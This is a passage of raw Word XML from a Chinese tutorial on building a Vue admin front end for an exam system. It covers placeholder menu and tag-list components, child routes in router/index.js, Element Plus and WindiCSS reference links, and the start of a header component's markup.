        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB18375" w14:textId="6371CDC7" w:rsidR="004A250B" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F67AF7" w14:textId="77777777" w:rsidR="004A250B" w:rsidRDefault="004A250B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396A820F" w14:textId="099F95A8" w:rsidR="003C4313" w:rsidRDefault="004A250B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A250B">
        <w:t>FMenu.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C4760" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4728ACDD" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7C741F" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FC14D" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>侧边</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B275A26" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C201E3" w14:textId="3FBA3FF8" w:rsidR="004A250B" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B041E" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0779CF5D" w14:textId="3C6773A5" w:rsidR="003C4313" w:rsidRDefault="004A250B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A250B">
        <w:t>FTagList.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714DBCE" w14:textId="77777777" w:rsidR="003C4313" w:rsidRPr="00181907" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EF67C2" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C6C4D" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F836BE4" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCEB9DC" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26415072" w14:textId="08BCF0F6" w:rsidR="003C4313" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7DA64" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0A5D01" w14:textId="2C70D7CB" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>router/index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A9453" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7065A7" w14:textId="1C1D5BE9" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由中，这部分内容需要设置子路由了。</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该是默认登录</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，就使用</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidR="00CC11D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其他路径的话，默认都是这个路由。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44C622" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD9C950" w14:textId="775F23B4" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import Admin from "~/layouts/admin.vue"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0CBC95" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15AB74A7" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>const routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6D9F2" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35040A5B" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        path: '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E1F32" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        component: Admin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFAEB5" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>子路由</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E452D" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        children: [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6086B7" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            path: "/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D2399" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            component: Index,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB9964" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            meta: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1968985A" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                title: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA97475" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE59C72" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFA97D" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRPr="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBFEB1D" w14:textId="2D5BB5F7" w:rsidR="00E5659D" w:rsidRPr="00CC11D6" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5659D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D56E7B" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6ABE33" w14:textId="77777777" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF586C8" w14:textId="6B19856E" w:rsidR="00E5659D" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终登录，大致可以看到效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241F1EA" w14:textId="2CBC1F1A" w:rsidR="003C4313" w:rsidRDefault="00E5659D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4801EC68" wp14:editId="47B27DFB">
            <wp:extent cx="5274310" cy="1844675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="68049130"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9130" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1844675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA71B4" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B18DC1C" w14:textId="1E2A5ACE" w:rsidR="003C4313" w:rsidRDefault="00ED311D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="704" w:name="_Toc159780134"/>
      <w:r w:rsidRPr="00ED311D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公共头部开发</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED311D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED311D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样式布局</w:t>
      </w:r>
      <w:bookmarkEnd w:id="704"/>
    </w:p>
    <w:p w14:paraId="73C0F037" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCC6A36" w14:textId="0EDACD75" w:rsidR="003C4313" w:rsidRDefault="00556D3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图标参考网站：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17367CD1" w14:textId="2806AF18" w:rsidR="00556D3C" w:rsidRPr="00181907" w:rsidRDefault="00556D3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00556D3C">
        <w:t>https://element-plus.org/zh-CN/component/icon.html#icon-collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1379BF" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12329651" w14:textId="1F3035B2" w:rsidR="003C4313" w:rsidRDefault="00BA0A41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下拉菜单样式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD53B4" w14:textId="21B72953" w:rsidR="003C4313" w:rsidRDefault="00BA0A41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA0A41">
        <w:t>https://element-plus.org/zh-CN/component/dropdown.html#%E8%A7%A6%E5%8F%91%E5%AF%B9%E8%B1%A1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40F5A9" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F2A048" w14:textId="162F298F" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头像样式参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1D22FE" w14:textId="26B8E90B" w:rsidR="003C4313" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92AAA">
        <w:t>https://element-plus.org/zh-CN/component/avatar.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5053B41A" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363136B1" w14:textId="6592F7A0" w:rsidR="00A92AAA" w:rsidRPr="00181907" w:rsidRDefault="004412B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字体样式参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BF7B3" w14:textId="5EB027E1" w:rsidR="00A92AAA" w:rsidRDefault="004412B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004412B3">
        <w:t>https://cn.windicss.org/utilities/general/typography.html#font-weight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A47DE" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2014188B" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFE60F1" w14:textId="3600C2AD" w:rsidR="00A92AAA" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FHeader</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9CC39" w14:textId="77777777" w:rsidR="00A92AAA" w:rsidRDefault="00A92AAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AF8853" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500DA28E" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div class="f-header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36220996" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;span class="logo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D69DD3" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="mr-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E719BCB" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;ElemeFilled /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772830E" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1A6E6D" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B2A3B" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B600315" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D631AF6" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;Fold /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E4395" w14:textId="77777777" w:rsidR="005B1F9E" w:rsidRDefault="005B1F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-icon&gt;</w:t>
